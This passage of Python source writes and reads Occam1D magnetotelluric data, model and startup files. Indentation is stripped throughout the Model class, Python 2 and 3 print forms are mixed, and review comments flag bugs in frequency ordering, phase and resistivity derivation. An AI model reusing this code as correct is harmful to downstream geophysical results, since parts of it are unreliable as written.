                    include = (data1[:,0,1]/data2[:,0,1] > 0) & (data1[:,1,0]/data2[:,1,0] > 0)
                else:
                    include = (phi[:,0,1]%180 <= 90) & (phi[:,0,1]%180 >= 0) & (phi[:,1,0]%180 <= 90) & (phi[:,1,0]%180 >= 0)
            freq,data1,data1_err,data2,data2_err = [arr[include] for arr in [freq, data1, data1_err, data2, data2_err]]
            nf = len(freq)
        # fix any zero errors to 100% of the res value or 90 degrees for phase
        data1_err[data1_err==0] = data1[data1_err==0]
        if 'z' in mode.lower():
            data2_err[data2_err==0] = data2[data2_err==0]
        else:
            data2_err[data2_err==0] = 90
        # set error floors
        if 'z' in mode.lower():
            if z_errorfloor > 0:
                data1_err = np.abs(data1_err)
                data1_err[data1_err/np.abs(data1+1j*data2) < z_errorfloor/100.] = np.abs(data1+1j*data2)[data1_err/np.abs(data1+1j*data2) < z_errorfloor/100.]*z_errorfloor/100.
                data2_err = data1_err.copy()
        else:
            if res_errorfloor > 0:
                data1_err[data1_err/data1 < res_errorfloor/100.] = data1[data1_err/data1 < res_errorfloor/100.]*res_errorfloor/100.
            if phase_errorfloor > 0:
                data2_err[data2_err < phase_errorfloor] = phase_errorfloor
        #make sure the savepath exists, if not create it
        if save_path is not None:
            self.save_path = save_path
        if self.save_path == None:
            try:
                self.save_path = os.path.dirname(edi_file)
            except TypeError:
                pass
        elif os.path.basename(self.save_path).find('.') > 0:
            self.save_path = os.path.dirname(self.save_path)
            self._data_fn = os.path.basename(self.save_path)
        if not os.path.exists(self.save_path):
            os.mkdir(self.save_path)
        self.data_fn = os.path.join(self.save_path,
                                    '{0}_{1}.dat'.format(self._data_fn, mode.upper()))
        # Assemble the file as a list of lines, written in one go at the end.
        dlines = []
        dlines.append('Format: EMData_1.1 \n')
        dlines.append('!mode: {0}\n'.format(mode.upper()))
        dlines.append('!rotation_angle = {0:.2f}\n'.format(thetar))
        #needs a transmitter to work so put in a dummy one
        dlines.append('# Transmitters: 1\n')
        dlines.append('0 0 0 0 0 \n')
        #write frequencies
        dlines.append('# Frequencies: {0}\n'.format(nf))
        # NOTE(review): frequencies (and rho/phi) are reversed to descending
        # order here, but data1/data2 still reference the *original* arrays,
        # so the written data are not reversed with them — confirm whether
        # this ordering mismatch is intended.
        if freq[0] < freq[1]:
            freq = freq[::-1]
            rho = rho[::-1]
            phi = phi[::-1]
            rho_err = rho_err[::-1]
            phi_err = phi_err[::-1]
        for ff in freq:
            dlines.append(' {0:{1}}\n'.format(ff, self._string_fmt))
        #needs a receiver to work so put in a dummy one
        dlines.append('# Receivers: 1 \n')
        dlines.append('0 0 0 0 0 0 \n')
        #write data
        dlines.append('# Data:{0}{1}\n'.format(self._ss, 2*nf))
        num_data_line = len(dlines)
        dlines.append(self._header_line)
        data_count = 0
        # data1 = np.abs(data1)
        # data2 = np.abs(data2)
        for ii in range(nf):
            if 'te' in mode.lower():
                pol = 'xy'
                i1,i2 = 0,1
                tetm = True
            elif 'tm' in mode.lower():
                pol = 'yx'
                i1,i2 = 1,0
                tetm = True
                # data1 *= -1
                # data2 *= -1
            else:
                tetm = False
            if tetm:
                if 'z' in mode.lower():
                    d1err,d2err = data1_err[ii, i1, i2],data2_err[ii, i1, i2]
                else:
                    if res_err == 'data':
                        d1err = data1_err[ii, i1, i2]
                    else:
                        d1err = data1[ii, i1, i2]*res_err/100.
                    if phase_err == 'data':
                        d2err = data2_err[ii, i1, i2]
                    else:
                        d2err = phase_err/100*(180/np.pi)
                # write lines
                if data1[ii, i1, i2] != 0.0:
                    dlines.append(self._ss.join([dstring1+'Z'+pol, str(ii+1), '0', '1',
                                                 '{0:{1}}'.format(data1[ii, i1, i2], self._string_fmt),
                                                 '{0:{1}}\n'.format(d1err, self._string_fmt)]))
                    data_count += 1
                if data2[ii, i1, i2] != 0.0:
                    dlines.append(self._ss.join([dstring2+'Z'+pol, str(ii+1), '0', '1',
                                                 '{0:{1}}'.format(data2[ii, i1, i2],self._string_fmt),
                                                 '{0:{1}}\n'.format(d2err, self._string_fmt)]))
                    data_count += 1
            # elif mode.lower() == 'tm':
            #     pol = 'yx'
            #     if res_err == 'data':
            #         rerr = rho_err[ii, 1, 0]
            #     else:
            #         rerr = rho[ii, 1, 0]*res_err/100.
            #
            #     if phase_err == 'data':
            #         perr = phi_err[ii, 1, 0]
            #     else:
            #         perr = phase_err/100*(180/np.pi)
            #
            #     # write lines
            #     if rho[ii, 1, 0] != 0.0:
            #         dlines.append(self._ss.join(['RhoZ'+pol, str(ii+1), '0', '1',
            #                                      '{0:{1}}'.format(rho[ii, 1, 0],self._string_fmt),
            #                                      '{0:{1}}\n'.format(rerr, self._string_fmt)]))
            #         data_count += 1
            #     if phi[ii, 1, 0] != 0.0:
            #         dlines.append(self._ss.join(['PhsZ'+pol, str(ii+1), '0', '1',
            #                                      '{0:{1}}'.format(phi[ii, 1, 0]%90,self._string_fmt),
            #                                      '{0:{1}}\n'.format(perr, self._string_fmt)]))
            #         data_count += 1
            else:
                if 'det' in mode.lower():
                    pol = 'xy'
                    if 'z' in mode.lower():
                        d1err,d2err = data1_err[ii], data2_err[ii]
                    else:
                        if res_err == 'data':
                            if edi_file is not None:
                                d1err, d2err = mtedi.MTcc.zerror2r_phi_error(zdet[ii].real,
                                                                             zdet_err[ii],
                                                                             zdet[ii].imag,
                                                                             zdet_err[ii])
                            else:
                                d1err = rho_err[ii]
                        else:
                            d1err = rho[ii]*res_err/100.
                        if phase_err == 'data':
                            if edi_file is not None:
                                d1err, d2err = mtedi.MTcc.zerror2r_phi_error(zdet[ii].real,
                                                                             zdet_err[ii],
                                                                             zdet[ii].imag,
                                                                             zdet_err[ii])
                            else:
                                d2err = phi_err[ii]
                        else:
                            d2err = phase_err/100*(180/np.pi)
                    # write lines
                    if rho[ii] != 0.0:
                        dlines.append(self._ss.join([dstring1+'Z'+pol, str(ii+1), '0', '1',
                                                     '{0:{1}}'.format(data1[ii],self._string_fmt),
                                                     '{0:{1}}\n'.format(d1err, self._string_fmt)]))
                        data_count += 1
                    if phi[ii] != 0.0:
                        dlines.append(self._ss.join([dstring2+'Z'+pol, str(ii+1), '0', '1',
                                                     '{0:{1}}'.format(data2[ii]%180,self._string_fmt),
                                                     '{0:{1}}\n'.format(d2err, self._string_fmt)]))
                        data_count += 1
        # Stash the data used on the instance for later plotting/inspection.
        if 'z' in mode.lower():
            self.z, self.z_err = data1 + 1j*data2, data1_err
        else:
            if 'det' in mode.lower():
                self.res_det = rho
                self.phase_det = phi
            else:
                self.res_te = rho[:,0,1]
                self.phase_te = phi[:,0,1]
                self.res_tm = rho[:,1,0]
                self.phase_tm = phi[:,1,0]%180
        self.freq = freq
        #--> write file; patch the data count now that it is known
        dlines[num_data_line-1] = '# Data:{0}{1}\n'.format(self._ss, data_count)
        dfid = open(self.data_fn, 'w')
        dfid.writelines(dlines)
        dfid.close()
        print 'Wrote Data File to : {0}'.format(self.data_fn)
    def read_data_file(self, data_fn=None):
        """
        Read a 1D Occam data file into ``self.data``.

        Arguments:
        ----------
            **data_fn** : full path to data file

        Fills:
        --------
            **self.data** : dictionary with keys:
                * 'freq'    : array of frequencies (length nf)
                * 'resxy'/'resyx'     : (4, nf) arrays; rows are (0) data,
                                        (1) data error, (2) model response,
                                        (3) model error
                * 'phasexy'/'phaseyx' : (4, nf) arrays, same row layout
                * 'zxy'/'zyx'         : (4, nf) complex impedance arrays

        :Example: ::

            >>> old = occam1d.Data()
            >>> old.data_fn = r"/home/Occam1D/Line1/Inv1_TE/MT01TE.dat"
            >>> old.read_data_file()
        """
        if data_fn is not None:
            self.data_fn = data_fn
        if self.data_fn is None:
            raise IOError('Need to input a data file')
        elif os.path.isfile(self.data_fn) == False:
            raise IOError('Could not find {0}, check path'.format(self.data_fn))
        self._data_fn = os.path.basename(self.data_fn)
        self.save_path = os.path.dirname(self.data_fn)
        dfid = open(self.data_fn, 'r')
        #read in lines
        dlines = dfid.readlines()
        dfid.close()
        #make a dictionary of all the fields found so can put them into arrays
        # NOTE(review): find('#') returns -1 for lines without '#', which also
        # satisfies <= 3, so non-header lines add junk keys to finddict; the
        # keys actually used below ('Frequencies', 'Receivers', 'Data') are
        # unaffected.
        finddict = {}
        for ii, dline in enumerate(dlines):
            if dline.find('#')<=3:
                fkey = dline[2:].strip().split(':')[0]
                fvalue = ii
                finddict[fkey] = fvalue
        #get number of frequencies
        nfreq = int(dlines[finddict['Frequencies']][2:].strip().split(':')[1].strip())
        #frequency list
        freq = np.array([float(ff) for ff in dlines[finddict['Frequencies']+1:
                                                    finddict['Receivers']]])
        #data dictionary to put things into
        #check to see if there is alread one, if not make a new one
        if self.data is None:
            self.data = {'freq':freq,
                         'zxy':np.zeros((4,nfreq),dtype=complex),
                         'zyx':np.zeros((4,nfreq),dtype=complex),
                         'resxy':np.zeros((4,nfreq)),
                         'resyx':np.zeros((4,nfreq)),
                         'phasexy':np.zeros((4,nfreq)),
                         'phaseyx':np.zeros((4,nfreq))}
        #get data
        for dline in dlines[finddict['Data']+1:]:
            if dline.find('!') == 0:
                pass
            else:
                dlst = dline.strip().split()
                dlst = [dd.strip() for dd in dlst]
                if len(dlst) > 4:
                    jj = int(dlst[1])-1
                    dvalue = float(dlst[4])
                    derr = float(dlst[5])
                    # Dispatch on the data-type token (name or numeric code).
                    if dlst[0] == 'RhoZxy' or dlst[0] == '103':
                        self.mode ='TE'
                        self.data['resxy'][0, jj] = dvalue
                        self.data['resxy'][1, jj] = derr
                    if dlst[0] == 'PhsZxy' or dlst[0] == '104':
                        self.mode ='TE'
                        self.data['phasexy'][0, jj] = dvalue
                        self.data['phasexy'][1, jj] = derr
                    if dlst[0] == 'RhoZyx' or dlst[0] == '105':
                        self.mode ='TM'
                        self.data['resyx'][0, jj] = dvalue
                        self.data['resyx'][1, jj] = derr
                    if dlst[0] == 'PhsZyx' or dlst[0] == '106':
                        self.mode ='TM'
                        self.data['phaseyx'][0, jj] = dvalue
                        self.data['phaseyx'][1, jj] = derr
                    if dlst[0] == 'RealZxy' or dlst[0] == '113':
                        self.mode ='TEz'
                        self.data['zxy'][0, jj] = dvalue/(np.pi*4e-4)
                        self.data['zxy'][1, jj] = derr/(np.pi*4e-4)
                    if dlst[0] == 'ImagZxy' or dlst[0] == '114':
                        self.mode ='TEz'
                        self.data['zxy'][0, jj] += 1j*dvalue/(np.pi*4e-4)
                        self.data['zxy'][1, jj] = derr/(np.pi*4e-4)
                    if dlst[0] == 'RealZyx' or dlst[0] == '115':
                        self.mode ='TMz'
                        self.data['zyx'][0, jj] = dvalue/(np.pi*4e-4)
                        self.data['zyx'][1, jj] = derr/(np.pi*4e-4)
                    if dlst[0] == 'ImagZyx' or dlst[0] == '116':
                        self.mode ='TMz'
                        self.data['zyx'][0, jj] += 1j*dvalue/(np.pi*4e-4)
                        self.data['zyx'][1, jj] = derr/(np.pi*4e-4)
        if 'z' in self.mode:
            if 'TE' in self.mode:
                pol='xy'
            elif 'TM' in self.mode:
                pol='yx'
            self.data['res'+pol][0] = 0.2*np.abs(self.data['z'+pol][0])**2./freq
            # NOTE(review): the phase here is computed from the (real-valued)
            # 'res' array, whose .imag is all zeros — presumably 'z'+pol was
            # intended; confirm before relying on these phases.
            self.data['phase'+pol][0] = np.rad2deg(np.arctan(self.data['res'+pol][0].imag/self.data['res'+pol][0].real))
            for jjj in range(len(freq)):
                self.data['res'+pol][1,jjj],self.data['phase'+pol][1,jjj] =\
                mtcc.zerror2r_phi_error(self.data['z'+pol][0,jjj].real,self.data['z'+pol][1,jjj],
                                        self.data['z'+pol][0,jjj].imag,self.data['z'+pol][1,jjj])
            # NOTE(review): resyx is derived from zxy here — looks like it
            # should be zyx; confirm intended.
            self.data['resyx'][0] = 0.2*np.abs(self.data['zxy'][0])**2./freq
        self.freq = freq
        self.res_te = self.data['resxy']
        self.res_tm = self.data['resyx']
        self.phase_te = self.data['phasexy']
        self.phase_tm = self.data['phaseyx']
    def read_resp_file(self, resp_fn=None, data_fn=None):
        """
        Read an Occam1D .resp file (model response) alongside the data file.

        Arguments:
        ---------
            **resp_fn** : full path to response file
            **data_fn** : full path to data file

        Fills:
        --------
            *freq*     : array of frequencies (length nf)
            *res_te*   : TE resistivity (4, nf): (0) data, (1) data error,
                         (2) model response, (3) model error
            *res_tm*   : TM resistivity, same layout
            *phase_te* : TE phase, same layout
            *phase_tm* : TM phase, same layout

        :Example: ::

            >>> o1d = occam1d.Data()
            >>> o1d.data_fn = r"/home/occam1d/mt01/TE/Occam1D_DataFile_TE.dat"
            >>> o1d.read_resp_file(r"/home/occam1d/mt01/TE/TE_7.resp")
        """
        if resp_fn is not None:
            self.resp_fn = resp_fn
        if self.resp_fn is None:
            raise IOError('Need to input response file')
        if data_fn is not None:
            self.data_fn = data_fn
        if self.data_fn is None:
            raise IOError('Need to input data file')
        #--> read in data file; allocates self.data and the data rows
        self.read_data_file()
        #--> read response file
        dfid = open(self.resp_fn, 'r')
        dlines = dfid.readlines()
        dfid.close()
        # Map section headers to their line indices (same scheme as
        # read_data_file).
        finddict = {}
        for ii, dline in enumerate(dlines):
            if dline.find('#')<=3:
                fkey = dline[2:].strip().split(':')[0]
                fvalue = ii
                finddict[fkey] = fvalue
        for dline in dlines[finddict['Data']+1:]:
            if dline.find('!') == 0:
                pass
            else:
                dlst=dline.strip().split()
                if len(dlst) > 4:
                    # Columns: type, freq#, tx#, rx#, data, data err,
                    # response, response err.
                    jj = int(dlst[1])-1
                    dvalue = float(dlst[4])
                    derr = float(dlst[5])
                    rvalue = float(dlst[6])
                    try:
                        rerr = float(dlst[7])
                    except ValueError:
                        # Missing/garbled response error column.
                        rerr = 1000.
                    if dlst[0]=='RhoZxy' or dlst[0]=='103':
                        self.res_te[0,jj] = dvalue
                        self.res_te[1,jj] = derr
                        self.res_te[2,jj] = rvalue
                        self.res_te[3,jj] = rerr
                    if dlst[0]=='PhsZxy' or dlst[0]=='104':
                        self.phase_te[0,jj] = dvalue
                        self.phase_te[1,jj] = derr
                        self.phase_te[2,jj] = rvalue
                        self.phase_te[3,jj] = rerr
                    if dlst[0]=='RhoZyx' or dlst[0]=='105':
                        self.res_tm[0,jj] = dvalue
                        self.res_tm[1,jj] = derr
                        self.res_tm[2,jj] = rvalue
                        self.res_tm[3,jj] = rerr
                    if dlst[0]=='PhsZyx' or dlst[0]=='106':
                        self.phase_tm[0,jj] = dvalue
                        self.phase_tm[1,jj] = derr
                        self.phase_tm[2,jj] = rvalue
                        self.phase_tm[3,jj] = rerr
                    if dlst[0] == 'RealZxy' or dlst[0] == '113':
                        self.mode ='TEz'
                        self.data['zxy'][0, jj] = dvalue/(np.pi*4e-4)
                        self.data['zxy'][1, jj] = derr/(np.pi*4e-4)
                        self.data['zxy'][2, jj] = rvalue/(np.pi*4e-4)
                        self.data['zxy'][3, jj] = rerr/(np.pi*4e-4)
                    if dlst[0] == 'ImagZxy' or dlst[0] == '114':
                        self.mode ='TEz'
                        self.data['zxy'][0, jj] += 1j*dvalue/(np.pi*4e-4)
                        self.data['zxy'][1, jj] = derr/(np.pi*4e-4)
                        self.data['zxy'][2, jj] += 1j*rvalue/(np.pi*4e-4)
                        self.data['zxy'][3, jj] = rerr/(np.pi*4e-4)
                    if dlst[0] == 'RealZyx' or dlst[0] == '115':
                        self.mode ='TMz'
                        self.data['zyx'][0, jj] = dvalue/(np.pi*4e-4)
                        self.data['zyx'][1, jj] = derr/(np.pi*4e-4)
                        self.data['zyx'][2, jj] = rvalue/(np.pi*4e-4)
                        self.data['zyx'][3, jj] = rerr/(np.pi*4e-4)
                    if dlst[0] == 'ImagZyx' or dlst[0] == '116':
                        self.mode ='TMz'
                        self.data['zyx'][0, jj] += 1j*dvalue/(np.pi*4e-4)
                        self.data['zyx'][1, jj] = derr/(np.pi*4e-4)
                        self.data['zyx'][2, jj] += 1j*rvalue/(np.pi*4e-4)
                        self.data['zyx'][3, jj] = rerr/(np.pi*4e-4)
        if 'z' in self.mode:
            if 'TE' in self.mode:
                pol='xy'
            elif 'TM' in self.mode:
                pol='yx'
            # Convert impedance (rows 0=data, 2=response) to apparent
            # resistivity and phase, propagating errors.
            for ii in [0,2]:
                self.data['res'+pol][0+ii] = 0.2*np.abs(self.data['z'+pol][0+ii])**2./self.freq
                self.data['phase'+pol][0+ii] = np.rad2deg(np.arctan(self.data['z'+pol][0+ii].imag/ self.data['z'+pol][0+ii].real))
                self.data['res'+pol][1+ii] = self.data['res'+pol][0+ii]*self.data['z'+pol][1+ii].real/np.abs(self.data['z'+pol][0+ii])
                for jjj in range(len(self.freq)):
                    self.data['phase'+pol][1+ii,jjj] =\
                    mtcc.zerror2r_phi_error(self.data['z'+pol][0+ii,jjj].real,self.data['z'+pol][1+ii,jjj].real,
                                            self.data['z'+pol][0+ii,jjj].imag,self.data['z'+pol][1+ii,jjj].real)[1]
            if pol == 'xy':
                self.res_te = self.data['resxy']
                self.phase_te = self.data['phasexy']
            elif pol == 'yx':
                self.res_tm = self.data['resyx']
                self.phase_tm = self.data['phaseyx']
class Model(object):
    """
    Read and write the model file for Occam1D.

    All depth measurements are in meters.

    ======================== ==================================================
    Attributes               Description
    ======================== ==================================================
    _model_fn                basename for model file *default* is Model1D
    _ss                      string spacing in model file *default* is 3*' '
    _string_fmt              format of model layers *default* is '.0f'
    air_layer_height         height of air layer *default* is 10000
    bottom_layer             bottom of the model *default* is 50000
    itdict                   dictionary of values from iteration file
    iter_fn                  full path to iteration file
    model_depth              array of model depths
    model_fn                 full path to model file
    model_penalty            array of penalties for each model layer
    model_preference_penalty array of model preference penalties for each layer
    model_prefernce          array of preferences for each layer
    model_res                array of resistivities for each layer
    n_layers                 number of layers in the model
    num_params               number of parameters to invert for (n_layers+2)
    pad_z                    padding of model at depth *default* is 5 blocks
    save_path                path to save files
    target_depth             depth of target to investigate
    z1_layer                 depth of first layer *default* is 10
    ======================== ==================================================

    ======================== ==================================================
    Methods                  Description
    ======================== ==================================================
    write_model_file         write an Occam1D model file, where depth increases
                             on a logarithmic scale
    read_model_file          read an Occam1D model file
    read_iter_file           read an .iter file output by Occam1D
    ======================== ==================================================

    :Example: ::

        >>> #--> make a model file
        >>> m1 = occam1d.Model()
        >>> m1.write_model_file(save_path=r"/home/occam1d/mt01/TE")
    """
def __init__(self, model_fn=None, **kwargs):
self.model_fn = model_fn
self.iter_fn = None
self.n_layers = kwargs.pop('n_layers', 100)
self.bottom_layer = kwargs.pop('bottom_layer', 50000)
self.target_depth = kwargs.pop('target_layer', 10000)
self.pad_z = kwargs.pop('pad_z', 5)
self.z1_layer = kwargs.pop('z1_layer', 10)
self.air_layer_height = kwargs.pop('zir_layer_height', 10000)
self.save_path = kwargs.pop('save_path', None)
if self.model_fn is not None and self.save_path is None:
self.save_path = os.path.dirname(self.model_fn)
self._ss = ' '*3
self._string_fmt = '.0f'
self._model_fn = 'Model1D'
self.model_res = None
self.model_depth = None
self.model_penalty = None
self.model_prefernce = None
self.model_preference_penalty = None
self.num_params = None
def write_model_file(self,save_path=None, **kwargs):
"""
Makes a 1D model file for Occam1D.
Arguments:
----------
**save_path** :path to save file to, if just path saved as
savepath\model.mod, if None defaults to dirpath
**n_layers** : number of layers
**bottom_layer** : depth of bottom layer in meters
**target_depth** : depth to target under investigation
**pad_z** : padding on bottom of model past target_depth
**z1_layer** : depth of first layer in meters
**air_layer_height** : height of air layers in meters
Returns:
--------
**Occam1D.modelfn** = full path to model file
..Note: This needs to be redone.
:Example: ::
>>> old = occam.Occam1D()
>>> old.make1DModelFile(savepath=r"/home/Occam1D/Line1/Inv1_TE",
>>> nlayers=50,bottomlayer=10000,z1layer=50)
>>> Wrote Model file: /home/Occam1D/Line1/Inv1_TE/Model1D
"""
if save_path is not None:
self.save_path = save_path
if os.path.isdir == False:
os.mkdir(self.save_path)
self.model_fn = os.path.join(self.save_path, self._model_fn)
for key in kwargs.keys():
setattr(self, key, kwargs[key])
#---------create depth layers--------------------
log_z = np.logspace(np.log10(self.z1_layer),
np.log10(self.target_depth-
np.logspace(np.log10(self.z1_layer),
np.log10(self.target_depth),
num=self.n_layers)[-2]),
num=self.n_layers-self.pad_z)
ztarget = np.array([zz-zz%10**np.floor(np.log10(zz)) for zz in
log_z])
log_zpad = np.logspace(np.log10(self.target_depth),
np.log10(self.bottom_layer-
np.logspace(np.log10(self.target_depth),
np.log10(self.bottom_layer),
num=self.pad_z)[-2]),
num=self.pad_z)
zpadding = np.array([zz-zz%10**np.floor(np.log10(zz)) for zz in
log_zpad])
z_nodes = np.append(ztarget, zpadding)
self.model_depth = np.array([z_nodes[:ii+1].sum()
for ii in range(z_nodes.shape[0])])
self.num_params = self.n_layers+2
#make the model file
modfid=open(self.model_fn,'w')
modfid.write('Format: Resistivity1DMod_1.0'+'\n')
modfid.write('#LAYERS: {0}\n'.format(self.num_params))
modfid.write('!Set free values to -1 or ? \n')
modfid.write('!penalize between 1 and 0,'+
'0 allowing jump between layers and 1 smooth. \n' )
modfid.write('!preference is the assumed resistivity on linear scale. \n')
modfid.write('!pref_penalty needs to be put if preference is not 0 [0,1]. \n')
modfid.write('! {0}\n'.format(self._ss.join(['top_depth', 'resistivity',
'penalty','preference',
'pref_penalty'])))
modfid.write(self._ss.join([str(-self.air_layer_height),
'1d12', '0', '0', '0', '!air layer','\n']))
modfid.write(self._ss.join([ '0', '-1', '0', '0', '0',
'!first ground layer', '\n']))
for ll in self.model_depth:
modfid.write(self._ss.join(['{0:{1}}'.format(np.ceil(ll),
self._string_fmt),
'-1','1','0','0','\n']))
modfid.close()
print 'Wrote Model file: {0}'.format(self.model_fn)
def read_model_file(self, model_fn=None):
"""
will read in model 1D file
Arguments:
----------
**modelfn** : full path to model file
Fills attributes:
--------
* model_depth' : depth of model in meters
* model_res : value of resisitivity
* model_penalty : penalty
* model_preference : preference
* model_penalty_preference : preference penalty
:Example: ::
>>> m1 = occam1d.Model()
>>> m1.savepath = r"/home/Occam1D/Line1/Inv1_TE"
>>> m1.read_model_file()
"""
if model_fn is not None:
self.model_fn = model_fn
if self.model_fn is None:
raise IOError('Need to input a model file')
elif os.path.isfile(self.model_fn) == False:
raise IOError('Could not find{0}, check path'.format(self.model_fn))
self._model_fn = os.path.basename(self.model_fn)
self.save_path = os.path.dirname(self.model_fn)
mfid = open(self.model_fn, 'r')
mlines = mfid.readlines()
mfid.close()
mdict = {}
mdict['nparam'] = 0
for key in ['depth', 'res', 'pen', 'pref', 'prefpen']:
mdict[key] = []
for mm, mline in enumerate(mlines):
if mline.find('!') == 0:
pass
elif mline.find(':') >= 0:
mlst = mline.strip().split(':')
mdict[mlst[0]] = mlst[1]
else:
mlst = mline.strip().split()
mdict['depth'].append(float(mlst[0]))
if mlst[1] == '?':
mdict['res'].append(-1)
elif mlst[1] == '1d12':
mdict['res'].append(1.0E12)
else:
try:
mdict['res'].append(float(mlst[1]))
except ValueError:
mdict['res'].append(-1)
mdict['pen'].append(float(mlst[2]))
mdict['pref'].append(float(mlst[3]))
mdict['prefpen'].append(float(mlst[4]))
if mlst[1] == '-1' or mlst[1] == '?':
mdict['nparam'] += 1
#make everything an array
for key in ['depth', 'res', 'pen', 'pref', 'prefpen']:
mdict[key] = np.array(mdict[key])
#create an array with empty columns to put the TE and TM models into
mres = np.zeros((len(mdict['res']),2))
mres[:,0] = mdict['res']
mdict['res'] = mres
#make attributes
self.model_res = mdict['res']
self.model_depth = mdict['depth']
self.model_penalty = mdict['pen']
self.model_prefernce = mdict['pref']
self.model_preference_penalty = mdict['prefpen']
self.num_params = mdict['nparam']
def read_iter_file(self, iter_fn=None, model_fn=None):
"""
read an 1D iteration file
Arguments:
----------
**imode** : mode to read from
Returns:
--------
**Occam1D.itdict** : dictionary with keys of the header:
**model_res** : fills this array with the appropriate
values (0) for data, (1) for model
:Example: ::
>>> m1 = occam1d.Model()
>>> m1.model_fn = r"/home/occam1d/mt01/TE/Model1D"
>>> m1.read_iter_file(r"/home/Occam1D/Inv1_TE/M01TE_15.iter")
"""
if iter_fn is not None:
self.iter_fn = iter_fn
if self.iter_fn is None:
raise IOError('Need to input iteration file')
if model_fn is not None:
self.model_fn = model_fn
if self.model_fn is None:
raise IOError('Need to input a model file')
else:
self.read_model_file()
freeparams = np.where(self.model_res == -1)[0]
ifid = file(self.iter_fn, 'r')
ilines = ifid.readlines()
ifid.close()
self.itdict={}
model=[]
for ii,iline in enumerate(ilines):
if iline.find(':')>=0:
ikey=iline[0:20].strip()
ivalue=iline[20:].split('!')[0].strip()
self.itdict[ikey[:-1]]=ivalue
else:
try:
ilst=iline.strip().split()
for kk in ilst:
model.append(float(kk))
except ValueError:
pass
#put the model values into the model dictionary into the res array
#for easy manipulation and access.
model=np.array(model)
self.model_res[freeparams, 1] = model
class Startup(object):
    """
    Read and write startup (input) files for Occam1D.

    ====================== ====================================================
    Attributes             Description
    ====================== ====================================================
    _ss                    string spacing
    _startup_fn            basename of startup file *default* is OccamStartup1D
    data_fn                full path to data file
    debug_level            debug level *default* is 1
    description            description of inversion for your self
                           *default* is 1D_Occam_Inv
    max_iter               maximum number of iterations *default* is 20
    model_fn               full path to model file
    rough_type             roughness type *default* is 1
    save_path              full path to save files to
    start_iter             first iteration number *default* is 0
    start_lagrange         starting lagrange number on log scale
                           *default* is 5
    start_misfit           starting misfit value *default* is 100
    start_rho              starting resistivity value (halfspace) in log scale
                           *default* is 100
    start_rough            starting roughness (ignored by Occam1D)
                           *default* is 1E7
    startup_fn             full path to startup file
    target_rms             target rms *default* is 1.0
    ====================== ====================================================
    """

    def __init__(self, data_fn=None, model_fn=None, **kwargs):
        self.data_fn = data_fn
        self.model_fn = model_fn

        # robustness fix: always define save_path; the original left the
        # attribute unset when both file names were None, causing an
        # AttributeError later on
        if self.data_fn is not None:
            self.save_path = os.path.dirname(self.data_fn)
        elif self.model_fn is not None:
            self.save_path = os.path.dirname(self.model_fn)
        else:
            self.save_path = None

        self.startup_fn = None
        self.rough_type = kwargs.pop('rough_type', 1)
        self.max_iter = kwargs.pop('max_iter', 20)
        self.target_rms = kwargs.pop('target_rms', 1)
        self.start_rho = kwargs.pop('start_rho', 100)
        self.description = kwargs.pop('description', '1D_Occam_Inv')
        self.start_lagrange = kwargs.pop('start_lagrange', 5.0)
        self.start_rough = kwargs.pop('start_rough', 1.0E7)
        self.debug_level = kwargs.pop('debug_level', 1)
        self.start_iter = kwargs.pop('start_iter', 0)
        self.start_misfit = kwargs.pop('start_misfit', 100)
        self.min_max_bounds = kwargs.pop('min_max_bounds', None)
        self.model_step = kwargs.pop('model_step', None)
        self._startup_fn = 'OccamStartup1D'
        self._ss = ' ' * 3

    def write_startup_file(self, save_path=None, **kwargs):
        """
        Write a 1D startup file for Occam1D.  Requires self.data_fn and
        self.model_fn to be set; the data and model files are read to fill in
        the parameter count and the starting half-space model.

        Arguments:
        ----------
            **save_path** : directory to save the file in; the file is written
                            as save_path/OccamStartup1D.  If None,
                            self.save_path is used.

        Other keyword arguments are set as attributes first; useful ones are
        rough_type, max_iter, target_rms, start_rho, description,
        start_lagrange, start_rough, debug_level, start_iter and start_misfit.

        Returns:
        --------
            fills self.startup_fn with the full path to the written file.

        :Example: ::

            >>> s1 = occam1d.Startup(data_fn=dfn, model_fn=mfn)
            >>> s1.write_startup_file()
        """
        if save_path is not None:
            self.save_path = save_path
        if not os.path.isdir(self.save_path):
            os.mkdir(self.save_path)

        self.startup_fn = os.path.join(self.save_path, self._startup_fn)

        # --> read data file
        if self.data_fn is None:
            raise IOError('Need to input data file name.')
        else:
            data = Data()
            data.read_data_file(self.data_fn)

        # --> read model file
        if self.model_fn is None:
            raise IOError('Need to input model file name.')
        else:
            model = Model()
            model.read_model_file(self.model_fn)

        # --> get any keywords
        for key in kwargs.keys():
            setattr(self, key, kwargs[key])

        # --> write input file
        infid = open(self.startup_fn, 'w')
        infid.write('{0:<21}{1}\n'.format('Format:', 'OCCAMITER_FLEX'))
        infid.write('{0:<21}{1}\n'.format('Description:', self.description))
        infid.write('{0:<21}{1}\n'.format('Model File:',
                                          os.path.basename(self.model_fn)))
        infid.write('{0:<21}{1}\n'.format('Data File:',
                                          os.path.basename(self.data_fn)))
        infid.write('{0:<21}{1}\n'.format('Date/Time:', time.ctime()))
        infid.write('{0:<21}{1}\n'.format('Max Iter:', self.max_iter))
        infid.write('{0:<21}{1}\n'.format('Target Misfit:', self.target_rms))
        infid.write('{0:<21}{1}\n'.format('Roughness Type:', self.rough_type))
        if self.min_max_bounds is None:
            infid.write('{0:<21}{1}\n'.format('!Model Bounds:', 'min,max'))
        else:
            infid.write('{0:<21}{1},{2}\n'.format('Model Bounds:',
                                                  self.min_max_bounds[0],
                                                  self.min_max_bounds[1]))
        if self.model_step is None:
            infid.write('{0:<21}{1}\n'.format('!Model Value Steps:',
                                              'stepsize'))
        else:
            infid.write('{0:<21}{1}\n'.format('Model Value Steps:',
                                              self.model_step))
        infid.write('{0:<21}{1}\n'.format('Debug Level:', self.debug_level))
        infid.write('{0:<21}{1}\n'.format('Iteration:', self.start_iter))
        infid.write('{0:<21}{1}\n'.format('Lagrange Value:', self.start_lagrange))
        infid.write('{0:<21}{1}\n'.format('Roughness Value:', self.start_rough))
        infid.write('{0:<21}{1}\n'.format('Misfit Value:', self.start_misfit))
        infid.write('{0:<21}{1}\n'.format('Misfit Reached:', 0))
        infid.write('{0:<21}{1}\n'.format('Param Count:', model.num_params))

        # starting model is a log-scale half space
        for ii in range(model.num_params):
            infid.write('{0}{1:.2f}\n'.format(self._ss,
                                              np.log10(self.start_rho)))
        infid.close()
        print('Wrote Input File: {0}'.format(self.startup_fn))

    def read_startup_file(self, startup_fn=None):
        """
        Read a 1D startup file.  Header entries are set as lowercase
